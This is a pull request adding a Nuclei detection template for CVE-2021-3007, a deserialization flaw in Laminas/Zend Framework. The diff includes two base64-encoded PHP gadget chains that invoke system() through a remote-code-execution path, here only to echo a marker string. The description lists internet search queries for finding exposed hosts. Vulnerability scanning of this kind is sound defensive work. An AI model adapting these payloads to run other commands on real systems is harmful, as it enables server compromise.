### PR TITLE
Add CVE-2021-3007 - Laminas/Zend Framework Deserialization RCE

### DIFF
--- a/http/cves/2021/CVE-2021-3007.yaml
+++ b/http/cves/2021/CVE-2021-3007.yaml
@@ -1,0 +1,82 @@
+id: CVE-2021-3007
+
+info:
+  name: Laminas/Zend Framework - Insecure Deserialization RCE
+  author: KrE80r
+  severity: critical
+  description: |
+    Laminas Project laminas-http before 2.14.2 and Zend Framework 3.0.0 contain
+    a deserialization vulnerability. The Zend\Http\Response\Stream class's
+    __destruct() method can be exploited via a gadget chain to achieve
+    remote code execution when user-controlled serialized data is deserialized.
+    The gadget chain leverages View\Helper\Gravatar, View\Renderer\PhpRenderer,
+    and Config\Config to trigger arbitrary function execution.
+  impact: |
+    Successful exploitation allows remote code execution with web server privileges.
+    The vulnerability enables arbitrary command execution and system compromise
+    through unsafe deserialization of attacker-controlled data.
+  remediation: |
+    Upgrade laminas-http to version 2.14.2 or later. Avoid using unserialize() on
+    user-controlled data. Implement input validation and use safe serialization
+    formats like JSON.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3007
+    - https://github.com/advisories/GHSA-xx8f-qf9f-5fgw
+    - https://github.com/laminas/laminas-http/releases/tag/2.14.2
+    - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
+    - https://www.ambionics.io/blog/zend-framework-deserialization
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-3007
+    cwe-id: CWE-502
+    epss-score: 0.97373
+    epss-percentile: 0.99841
+    cpe: cpe:2.3:a:laminas:laminas-http:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 8
+    vendor: laminas
+    product: laminas-http
+    shodan-query: http.html:"laminas" || http.html:"zend"
+    fofa-query: body="laminas" || body="zend"
+    publicwww-query: '"laminas" || "zend framework"'
+    kev: true
+  tags: cve,cve2021,laminas,zend,deserialization,rce,kev
+
+http:
+  - raw:
+      - |
+        POST {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        {{param}}={{payload}}
+
+    attack: clusterbomb
+    payloads:
+      path:
+        - /
+        - /index.php
+      param:
+        - data
+        - payload
+      payload:
+        # Laminas namespace gadget chain
+        - TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19
+        # Zend namespace gadget chain
+        - TzoyNToiWmVuZFxIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086MjU6IlplbmRcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMDoiWmVuZFxWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQxOiIAWmVuZFxWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoxODoiWmVuZFxDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "nucleiCVE20213007"
+
+      - type: status
+        status:
+          - 200
+          - 500


### PR DESCRIPTION
/claim #14236

### PR Information

- Added CVE-2021-3007 - Laminas/Zend Framework Insecure Deserialization RCE
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2021-3007
  - https://www.ambionics.io/blog/zend-framework-deserialization

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

**Vulnerable Test Environment:**
- Docker repo: https://github.com/KrE80r/cve-2021-3007-vulnerable
- One-command setup: `docker-compose up -d`

**Template Features:**
- Dual namespace support (Laminas + Zend)
- Multiple endpoint paths (/, /index.php)
- Multiple parameter names (data, payload)
- KEV flagged (FreakOut botnet)

**Search Queries:**
- Shodan: `http.html:"laminas" || http.html:"zend"`
- FOFA: `body="laminas" || body="zend"`
- PublicWWW: `"laminas" || "zend framework"`

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)